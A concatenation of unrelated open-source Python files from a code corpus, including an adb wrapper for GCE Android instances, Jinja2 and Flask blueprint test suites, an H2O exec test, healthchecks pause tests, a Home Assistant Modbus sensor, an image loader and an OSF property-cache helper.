cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
#override
def Pull(self, remote, local, **kwargs):
"""Pulls a file from the gce instance to the host.
Args:
remote: Path on the instance filesystem.
local: Path on the host filesystem.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
cmd = [
'scp',
'-p',
'-r',
'-i', _SSH_KEY_FILE,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'root@%s:%s' % (self._instance_ip, remote),
local,
]
status, _ = cmd_helper.GetCmdStatusAndOutput(cmd)
if status:
raise device_errors.AdbCommandFailedError(
cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
try:
adb_wrapper.VerifyLocalFileExists(local)
except (subprocess.CalledProcessError, IOError):
logging.exception('Error when pulling files from android instance.')
raise device_errors.AdbCommandFailedError(
cmd, 'File not reachable on host: %s' % local,
device_serial=str(self))
#override
def Install(self, apk_path, forward_lock=False, reinstall=False,
sd_card=False, **kwargs):
"""Installs an apk on the gce instance
Args:
apk_path: Host path to the APK file.
forward_lock: (optional) If set forward-locks the app.
reinstall: (optional) If set reinstalls the app, keeping its data.
sd_card: (optional) If set installs on the SD card.
"""
adb_wrapper.VerifyLocalFileExists(_SSH_KEY_FILE)
adb_wrapper.VerifyLocalFileExists(apk_path)
cmd = ['install']
if forward_lock:
cmd.append('-l')
if reinstall:
cmd.append('-r')
if sd_card:
cmd.append('-s')
self.Push(apk_path, '/data/local/tmp/tmp.apk')
cmd = ['pm'] + cmd
cmd.append('/data/local/tmp/tmp.apk')
output = self.Shell(' '.join(cmd))
self.Shell('rm /data/local/tmp/tmp.apk')
if 'Success' not in output:
raise device_errors.AdbCommandFailedError(
cmd, output, device_serial=self._device_serial)
#override
@property
def is_emulator(self):
return True
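# Illustrative usage sketch (serial and paths below are made up, not taken from this file):
#   from devil.android.sdk.gce_adb_wrapper import GceAdbWrapper
#   adb = GceAdbWrapper('127.0.0.1:5555')
#   adb.Push('/tmp/local_file', '/data/local/tmp/remote_file')  # goes over scp
#   adb.Pull('/data/local/tmp/remote_file', '/tmp/copy_back')   # goes over scp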
| apache-2.0 |
JackieXie168/rethinkdb | test/common/http_support/jinja2/testsuite/debug.py | 415 | 1935 |
# -*- coding: utf-8 -*-
"""
jinja2.testsuite.debug
~~~~~~~~~~~~~~~~~~~~~~
Tests the debug system.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import unittest
from jinja2.testsuite import JinjaTestCase, filesystem_loader
from jinja2 import Environment, TemplateSyntaxError
env = Environment(loader=filesystem_loader)
class DebugTestCase(JinjaTestCase):
def test_runtime_error(self):
def test():
tmpl.render(fail=lambda: 1 / 0)
tmpl = env.get_template('broken.html')
self.assert_traceback_matches(test, r'''
File ".*?broken.html", line 2, in (top-level template code|<module>)
\{\{ fail\(\) \}\}
File ".*?debug.pyc?", line \d+, in <lambda>
tmpl\.render\(fail=lambda: 1 / 0\)
ZeroDivisionError: (int(eger)? )?division (or modulo )?by zero
''')
def test_syntax_error(self):
# XXX: the .*? is necessary for python3 which does not hide
# some of the stack frames we don't want to show. Not sure
# what's up with that, but that is not that critical. Should
# be fixed though.
self.assert_traceback_matches(lambda: env.get_template('syntaxerror.html'), r'''(?sm)
File ".*?syntaxerror.html", line 4, in (template|<module>)
\{% endif %\}.*?
(jinja2\.exceptions\.)?TemplateSyntaxError: Encountered unknown tag 'endif'. Jinja was looking for the following tags: 'endfor' or 'else'. The innermost block that needs to be closed is 'for'.
''')
def test_regular_syntax_error(self):
def test():
raise TemplateSyntaxError('wtf', 42)
self.assert_traceback_matches(test, r'''
File ".*debug.pyc?", line \d+, in test
raise TemplateSyntaxError\('wtf', 42\)
(jinja2\.exceptions\.)?TemplateSyntaxError: wtf
line 42''')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DebugTestCase))
return suite
| apache-2.0 |
XXLRay/libreshot | build/lib.linux-x86_64-2.7/libreshot/classes/timeline.py | 2 | 1380 |
# LibreShot Video Editor is a program that creates, modifies, and edits video files.
# Copyright (C) 2009 Jonathan Thomas
#
# This file is part of LibreShot Video Editor (http://launchpad.net/openshot/).
#
# LibreShot Video Editor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LibreShot Video Editor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with LibreShot Video Editor. If not, see <http://www.gnu.org/licenses/>.
class timeline:
"""This class contains methods to simply displaying time codes"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
def get_friendly_time(self, milli):
"""Convert milliseconds to a tuple of the common time"""
sec, milli = divmod(milli, 1000)
min, sec = divmod(sec, 60)
hour, min = divmod(min, 60)
day, hour = divmod(hour, 24)
week, day = divmod(day, 7)
return (week, day, hour, min, sec, int(milli))
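# Worked example of the conversion above (values chosen by hand):
# 90061000 ms -> 0 weeks, 1 day, 1 hour, 1 minute, 1 second, 0 ms,
# i.e. get_friendly_time(90061000) == (0, 1, 1, 1, 1, 0).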
| gpl-3.0 |
vbelakov/h2o | py/testdir_single_jvm/test_exec2_cmp_many_cols.py | 9 | 5275 |
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e
print "Many cols, compare two data frames using exec =="
def write_syn_dataset(csvPathname, rowCount, colCount, SEED):
# one random generator, shared across all columns
r1 = random.Random(SEED)
dsf = open(csvPathname, "w+")
for i in range(rowCount):
rowData = []
for j in range(colCount):
r = r1.randint(0,1)
rowData.append(r)
rowDataCsv = ",".join(map(str,rowData))
dsf.write(rowDataCsv + "\n")
dsf.close()
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1,java_heap_GB=14)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_exec2_many_cols(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
(10, 10, 'cA', 200, 200),
(10, 1000, 'cB', 200, 200),
(10, 1000, 'cB', 200, 200),
# we timeout/fail on 500k? stop at 200k
# (10, 500000, 'cC', 200, 200),
# (10, 1000000, 'cD', 200, 360),
# (10, 1100000, 'cE', 60, 100),
# (10, 1200000, 'cF', 60, 120),
]
# h2b.browseTheCloud()
for (rowCount, colCount, hex_key, timeoutSecs, timeoutSecs2) in tryList:
SEEDPERFILE = random.randint(0, sys.maxint)
csvFilename = 'syn_' + str(SEEDPERFILE) + "_" + str(rowCount) + 'x' + str(colCount) + '.csv'
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "\nCreating random", csvPathname
write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE)
# import it N times and compare the N hex keys
REPEAT = 5
for i in range(REPEAT):
hex_key_i = hex_key + "_"+ str(i)
start = time.time()
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key_i,
timeoutSecs=timeoutSecs, doSummary=False)
print "Parse:", parseResult['destination_key'], "took", time.time() - start, "seconds"
# We should be able to see the parse result?
start = time.time()
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=timeoutSecs2)
print "Inspect:", parseResult['destination_key'], "took", time.time() - start, "seconds"
h2o_cmd.infoFromInspect(inspect, csvPathname)
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
# should match # of cols in header or ??
self.assertEqual(inspect['numCols'], colCount,
"parse created result with the wrong number of cols %s %s" % (inspect['numCols'], colCount))
self.assertEqual(inspect['numRows'], rowCount,
"parse created result with the wrong number of rows (header shouldn't count) %s %s" % \
(inspect['numRows'], rowCount))
# compare each to 0
for i in range(1,REPEAT):
hex_key_i = hex_key + "_" + str(i)
hex_key_0 = hex_key + "_0"
print "\nComparing %s to %s" % (hex_key_i, hex_key_0)
if 1==0:
execExpr = "%s[1,]+%s[1,]" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s[,1]+%s[,1]" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s+%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s!=%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "%s==%s" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "sum(%s==%s)" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "s=sum(%s==%s)" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "s=c(1); s=c(sum(%s==%s))" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "n=c(1); n=c(nrow(%s)*ncol(%s))" % (hex_key_0, hex_key_i)
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
execExpr = "r=c(1); r=s==n"
resultExec, result = h2e.exec_expr(execExpr=execExpr, timeoutSecs=30)
print "result:", result
if __name__ == '__main__':
h2o.unit_main()
| apache-2.0 |
iphoting/healthchecks | hc/front/tests/test_pause.py | 2 | 2485 |
from datetime import timedelta as td
from django.utils.timezone import now
from hc.api.models import Check
from hc.test import BaseTestCase
class PauseTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self.check = Check.objects.create(project=self.project, status="up")
self.url = "/checks/%s/pause/" % self.check.code
self.redirect_url = "/checks/%s/details/" % self.check.code
def test_it_pauses(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.post(self.url)
self.assertRedirects(r, self.redirect_url)
self.check.refresh_from_db()
self.assertEqual(self.check.status, "paused")
def test_it_rejects_get(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.get(self.url)
self.assertEqual(r.status_code, 405)
def test_it_allows_cross_team_access(self):
self.client.login(username="bob@example.org", password="password")
r = self.client.post(self.url)
self.assertRedirects(r, self.redirect_url)
def test_it_clears_last_start_alert_after(self):
self.check.last_start = now()
self.check.alert_after = self.check.last_start + td(hours=1)
self.check.save()
self.client.login(username="alice@example.org", password="password")
self.client.post(self.url)
self.check.refresh_from_db()
self.assertEqual(self.check.last_start, None)
self.assertEqual(self.check.alert_after, None)
def test_it_does_not_redirect_ajax(self):
self.client.login(username="alice@example.org", password="password")
r = self.client.post(self.url, HTTP_X_REQUESTED_WITH="XMLHttpRequest")
self.assertEqual(r.status_code, 200)
def test_it_requires_rw_access(self):
self.bobs_membership.rw = False
self.bobs_membership.save()
self.client.login(username="bob@example.org", password="password")
r = self.client.post(self.url)
self.assertEqual(r.status_code, 403)
def test_it_clears_next_nag_date(self):
self.profile.nag_period = td(hours=1)
self.profile.next_nag_date = now() + td(minutes=30)
self.profile.save()
self.client.login(username="alice@example.org", password="password")
self.client.post(self.url)
self.profile.refresh_from_db()
self.assertIsNone(self.profile.next_nag_date)
| bsd-3-clause |
MartinHjelmare/home-assistant | homeassistant/components/modbus/binary_sensor.py | 7 | 2062 |
"""Support for Modbus Coil sensors."""
import logging
import voluptuous as vol
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, CONF_SLAVE
from homeassistant.helpers import config_validation as cv
from . import CONF_HUB, DEFAULT_HUB, DOMAIN as MODBUS_DOMAIN
_LOGGER = logging.getLogger(__name__)
CONF_COIL = 'coil'
CONF_COILS = 'coils'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COILS): [{
vol.Required(CONF_COIL): cv.positive_int,
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_HUB, default=DEFAULT_HUB): cv.string,
vol.Optional(CONF_SLAVE): cv.positive_int,
}]
})
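# A minimal configuration sketch matching the schema above (hub, entity name and
# register numbers are assumptions, not taken from this file):
#
#   binary_sensor:
#     - platform: modbus
#       coils:
#         - name: fan_running
#           hub: hub1
#           slave: 1
#           coil: 100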
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Modbus binary sensors."""
sensors = []
for coil in config.get(CONF_COILS):
hub = hass.data[MODBUS_DOMAIN][coil.get(CONF_HUB)]
sensors.append(ModbusCoilSensor(
hub, coil.get(CONF_NAME), coil.get(CONF_SLAVE),
coil.get(CONF_COIL)))
add_entities(sensors)
class ModbusCoilSensor(BinarySensorDevice):
"""Modbus coil sensor."""
def __init__(self, hub, name, slave, coil):
"""Initialize the Modbus coil sensor."""
self._hub = hub
self._name = name
self._slave = int(slave) if slave else None
self._coil = int(coil)
self._value = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the sensor."""
return self._value
def update(self):
"""Update the state of the sensor."""
result = self._hub.read_coils(self._slave, self._coil, 1)
try:
self._value = result.bits[0]
except AttributeError:
_LOGGER.error("No response from hub %s, slave %s, coil %s",
self._hub.name, self._slave, self._coil)
| apache-2.0 |
campaul/photoshell | photoshell/image.py | 3 | 1343 |
from gi.repository import GdkPixbuf
from gi.repository import Gtk
import wand.image
class Image(object):
def __init__(self, image_path, datetime):
self.image_path = image_path
self.datetime = datetime
self._width = None
self._height = None
def width(self):
if not self._width:
pass
return self._width
def height(self):
if not self._height:
pass
return self._height
def load_pixbuf(self, max_width=1280, max_height=1024):
loader = GdkPixbuf.PixbufLoader.new()
loader.write(open(self.image_path, 'rb').read())
loader.close()
# Get Image Data
with wand.image.Image(filename=self.image_path) as image:
width, height = image.size
scale = min(max_height / height, min(max_width / width, 1))
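# e.g. a 6000x4000 source with the default limits gives
# scale = min(1024/4000, min(1280/6000, 1)) ~= 0.213, i.e. roughly 1280x853.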
width = width * scale
height = height * scale
# Create Pixbuf
pixbuf = loader.get_pixbuf().scale_simple(
width, height, GdkPixbuf.InterpType.BILINEAR)
pixbuf = pixbuf.scale_simple(
width, height, GdkPixbuf.InterpType.BILINEAR)
return pixbuf
def load_preview(self, max_width=1280, max_height=1024):
return Gtk.Image.new_from_pixbuf(
self.load_pixbuf(max_width, max_height)
)
| mit |
Papa2k15/flask | tests/test_blueprints.py | 143 | 18147 |
# -*- coding: utf-8 -*-
"""
tests.blueprints
~~~~~~~~~~~~~~~~
Blueprints (and currently modules)
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import flask
from flask._compat import text_type
from werkzeug.http import parse_cache_control_header
from jinja2 import TemplateNotFound
def test_blueprint_specific_error_handling():
frontend = flask.Blueprint('frontend', __name__)
backend = flask.Blueprint('backend', __name__)
sideend = flask.Blueprint('sideend', __name__)
@frontend.errorhandler(403)
def frontend_forbidden(e):
return 'frontend says no', 403
@frontend.route('/frontend-no')
def frontend_no():
flask.abort(403)
@backend.errorhandler(403)
def backend_forbidden(e):
return 'backend says no', 403
@backend.route('/backend-no')
def backend_no():
flask.abort(403)
@sideend.route('/what-is-a-sideend')
def sideend_no():
flask.abort(403)
app = flask.Flask(__name__)
app.register_blueprint(frontend)
app.register_blueprint(backend)
app.register_blueprint(sideend)
@app.errorhandler(403)
def app_forbidden(e):
return 'application itself says no', 403
c = app.test_client()
assert c.get('/frontend-no').data == b'frontend says no'
assert c.get('/backend-no').data == b'backend says no'
assert c.get('/what-is-a-sideend').data == b'application itself says no'
def test_blueprint_specific_user_error_handling():
class MyDecoratorException(Exception):
pass
class MyFunctionException(Exception):
pass
blue = flask.Blueprint('blue', __name__)
@blue.errorhandler(MyDecoratorException)
def my_decorator_exception_handler(e):
assert isinstance(e, MyDecoratorException)
return 'boom'
def my_function_exception_handler(e):
assert isinstance(e, MyFunctionException)
return 'bam'
blue.register_error_handler(MyFunctionException, my_function_exception_handler)
@blue.route('/decorator')
def blue_deco_test():
raise MyDecoratorException()
@blue.route('/function')
def blue_func_test():
raise MyFunctionException()
app = flask.Flask(__name__)
app.register_blueprint(blue)
c = app.test_client()
assert c.get('/decorator').data == b'boom'
assert c.get('/function').data == b'bam'
def test_blueprint_url_definitions():
bp = flask.Blueprint('test', __name__)
@bp.route('/foo', defaults={'baz': 42})
def foo(bar, baz):
return '%s/%d' % (bar, baz)
@bp.route('/bar')
def bar(bar):
return text_type(bar)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/1', url_defaults={'bar': 23})
app.register_blueprint(bp, url_prefix='/2', url_defaults={'bar': 19})
c = app.test_client()
assert c.get('/1/foo').data == b'23/42'
assert c.get('/2/foo').data == b'19/42'
assert c.get('/1/bar').data == b'23'
assert c.get('/2/bar').data == b'19'
def test_blueprint_url_processors():
bp = flask.Blueprint('frontend', __name__, url_prefix='/<lang_code>')
@bp.url_defaults
def add_language_code(endpoint, values):
values.setdefault('lang_code', flask.g.lang_code)
@bp.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code')
@bp.route('/')
def index():
return flask.url_for('.about')
@bp.route('/about')
def about():
return flask.url_for('.index')
app = flask.Flask(__name__)
app.register_blueprint(bp)
c = app.test_client()
assert c.get('/de/').data == b'/de/about'
assert c.get('/de/about').data == b'/de/'
def test_templates_and_static(test_apps):
from blueprintapp import app
c = app.test_client()
rv = c.get('/')
assert rv.data == b'Hello from the Frontend'
rv = c.get('/admin/')
assert rv.data == b'Hello from the Admin'
rv = c.get('/admin/index2')
assert rv.data == b'Hello from the Admin'
rv = c.get('/admin/static/test.txt')
assert rv.data.strip() == b'Admin File'
rv.close()
rv = c.get('/admin/static/css/test.css')
assert rv.data.strip() == b'/* nested file */'
rv.close()
# try/finally, in case other tests use this app for Blueprint tests.
max_age_default = app.config['SEND_FILE_MAX_AGE_DEFAULT']
try:
expected_max_age = 3600
if app.config['SEND_FILE_MAX_AGE_DEFAULT'] == expected_max_age:
expected_max_age = 7200
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = expected_max_age
rv = c.get('/admin/static/css/test.css')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == expected_max_age
rv.close()
finally:
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = max_age_default
with app.test_request_context():
assert flask.url_for('admin.static', filename='test.txt') == '/admin/static/test.txt'
with app.test_request_context():
try:
flask.render_template('missing.html')
except TemplateNotFound as e:
assert e.name == 'missing.html'
else:
assert 0, 'expected exception'
with flask.Flask(__name__).test_request_context():
assert flask.render_template('nested/nested.txt') == 'I\'m nested'
def test_default_static_cache_timeout():
app = flask.Flask(__name__)
class MyBlueprint(flask.Blueprint):
def get_send_file_max_age(self, filename):
return 100
blueprint = MyBlueprint('blueprint', __name__, static_folder='static')
app.register_blueprint(blueprint)
# try/finally, in case other tests use this app for Blueprint tests.
max_age_default = app.config['SEND_FILE_MAX_AGE_DEFAULT']
try:
with app.test_request_context():
unexpected_max_age = 3600
if app.config['SEND_FILE_MAX_AGE_DEFAULT'] == unexpected_max_age:
unexpected_max_age = 7200
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = unexpected_max_age
rv = blueprint.send_static_file('index.html')
cc = parse_cache_control_header(rv.headers['Cache-Control'])
assert cc.max_age == 100
rv.close()
finally:
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = max_age_default
def test_templates_list(test_apps):
from blueprintapp import app
templates = sorted(app.jinja_env.list_templates())
assert templates == ['admin/index.html', 'frontend/index.html']
def test_dotted_names():
frontend = flask.Blueprint('myapp.frontend', __name__)
backend = flask.Blueprint('myapp.backend', __name__)
@frontend.route('/fe')
def frontend_index():
return flask.url_for('myapp.backend.backend_index')
@frontend.route('/fe2')
def frontend_page2():
return flask.url_for('.frontend_index')
@backend.route('/be')
def backend_index():
return flask.url_for('myapp.frontend.frontend_index')
app = flask.Flask(__name__)
app.register_blueprint(frontend)
app.register_blueprint(backend)
c = app.test_client()
assert c.get('/fe').data.strip() == b'/be'
assert c.get('/fe2').data.strip() == b'/fe'
assert c.get('/be').data.strip() == b'/fe'
def test_dotted_names_from_app():
app = flask.Flask(__name__)
app.testing = True
test = flask.Blueprint('test', __name__)
@app.route('/')
def app_index():
return flask.url_for('test.index')
@test.route('/test/')
def index():
return flask.url_for('app_index')
app.register_blueprint(test)
with app.test_client() as c:
rv = c.get('/')
assert rv.data == b'/test/'
def test_empty_url_defaults():
bp = flask.Blueprint('bp', __name__)
@bp.route('/', defaults={'page': 1})
@bp.route('/page/<int:page>')
def something(page):
return str(page)
app = flask.Flask(__name__)
app.register_blueprint(bp)
c = app.test_client()
assert c.get('/').data == b'1'
assert c.get('/page/2').data == b'2'
def test_route_decorator_custom_endpoint():
bp = flask.Blueprint('bp', __name__)
@bp.route('/foo')
def foo():
return flask.request.endpoint
@bp.route('/bar', endpoint='bar')
def foo_bar():
return flask.request.endpoint
@bp.route('/bar/123', endpoint='123')
def foo_bar_foo():
return flask.request.endpoint
@bp.route('/bar/foo')
def bar_foo():
return flask.request.endpoint
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.request.endpoint
c = app.test_client()
assert c.get('/').data == b'index'
assert c.get('/py/foo').data == b'bp.foo'
assert c.get('/py/bar').data == b'bp.bar'
assert c.get('/py/bar/123').data == b'bp.123'
assert c.get('/py/bar/foo').data == b'bp.bar_foo'
def test_route_decorator_custom_endpoint_with_dots():
bp = flask.Blueprint('bp', __name__)
@bp.route('/foo')
def foo():
return flask.request.endpoint
try:
@bp.route('/bar', endpoint='bar.bar')
def foo_bar():
return flask.request.endpoint
except AssertionError:
pass
else:
raise AssertionError('expected AssertionError not raised')
try:
@bp.route('/bar/123', endpoint='bar.123')
def foo_bar_foo():
return flask.request.endpoint
except AssertionError:
pass
else:
raise AssertionError('expected AssertionError not raised')
def foo_foo_foo():
pass
pytest.raises(
AssertionError,
lambda: bp.add_url_rule(
'/bar/123', endpoint='bar.123', view_func=foo_foo_foo
)
)
pytest.raises(
AssertionError,
bp.route('/bar/123', endpoint='bar.123'),
lambda: None
)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
c = app.test_client()
assert c.get('/py/foo').data == b'bp.foo'
    # The rules didn't actually make it through
rv = c.get('/py/bar')
assert rv.status_code == 404
rv = c.get('/py/bar/123')
assert rv.status_code == 404
def test_template_filter():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'my_reverse' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['my_reverse'] == my_reverse
assert app.jinja_env.filters['my_reverse']('abcd') == 'dcba'
def test_add_template_filter():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'my_reverse' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['my_reverse'] == my_reverse
assert app.jinja_env.filters['my_reverse']('abcd') == 'dcba'
def test_template_filter_with_name():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter('strrev')
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'strrev' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['strrev'] == my_reverse
assert app.jinja_env.filters['strrev']('abcd') == 'dcba'
def test_add_template_filter_with_name():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse, 'strrev')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'strrev' in app.jinja_env.filters.keys()
assert app.jinja_env.filters['strrev'] == my_reverse
assert app.jinja_env.filters['strrev']('abcd') == 'dcba'
def test_template_filter_with_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def super_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_filter_after_route_with_template():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter()
def super_reverse(s):
return s[::-1]
app.register_blueprint(bp, url_prefix='/py')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_add_template_filter_with_template():
bp = flask.Blueprint('bp', __name__)
def super_reverse(s):
return s[::-1]
bp.add_app_template_filter(super_reverse)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_filter_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_filter('super_reverse')
def my_reverse(s):
return s[::-1]
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_add_template_filter_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
def my_reverse(s):
return s[::-1]
bp.add_app_template_filter(my_reverse, 'super_reverse')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
assert rv.data == b'dcba'
def test_template_test():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'is_boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['is_boolean'] == is_boolean
assert app.jinja_env.tests['is_boolean'](False)
def test_add_template_test():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'is_boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['is_boolean'] == is_boolean
assert app.jinja_env.tests['is_boolean'](False)
def test_template_test_with_name():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['boolean'] == is_boolean
assert app.jinja_env.tests['boolean'](False)
def test_add_template_test_with_name():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean, 'boolean')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
assert 'boolean' in app.jinja_env.tests.keys()
assert app.jinja_env.tests['boolean'] == is_boolean
assert app.jinja_env.tests['boolean'](False)
def test_template_test_with_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_template_test_after_route_with_template():
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test()
def boolean(value):
return isinstance(value, bool)
app.register_blueprint(bp, url_prefix='/py')
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_add_template_test_with_template():
bp = flask.Blueprint('bp', __name__)
def boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(boolean)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_template_test_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
@bp.app_template_test('boolean')
def is_boolean(value):
return isinstance(value, bool)
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
def test_add_template_test_with_name_and_template():
bp = flask.Blueprint('bp', __name__)
def is_boolean(value):
return isinstance(value, bool)
bp.add_app_template_test(is_boolean, 'boolean')
app = flask.Flask(__name__)
app.register_blueprint(bp, url_prefix='/py')
@app.route('/')
def index():
return flask.render_template('template_test.html', value=False)
rv = app.test_client().get('/')
assert b'Success!' in rv.data
|
bsd-3-clause
|
cwisecarver/osf.io
|
osf/utils/caching.py
|
29
|
2114
|
"""
A property cache mechanism.
The cache is stored on the model as a protected attribute. Expensive
property lookups, such as database access, can therefore be sped up
when accessed multiple times in the same request.
The property can also be safely set and deleted without interference.
NOTE: Properties will *not* be cached if they return a falsy value
(e.g. `None`). Use `django.utils.functional.cached_property` for
properties that can return `None` and do not need a setter.
"""
from __future__ import unicode_literals
from functools import wraps
# from https://github.com/etianen/django-optimizations/blob/master/src/optimizations/propertycache.py
class _CachedProperty(property):
"""A property who's value is cached on the object."""
def __init__(self, fget, fset=None, fdel=None, doc=None):
"""Initializes the cached property."""
self._cache_name = '_{name}_cache'.format(
name=fget.__name__,
)
# Wrap the accessors.
fget = self._wrap_fget(fget)
if callable(fset):
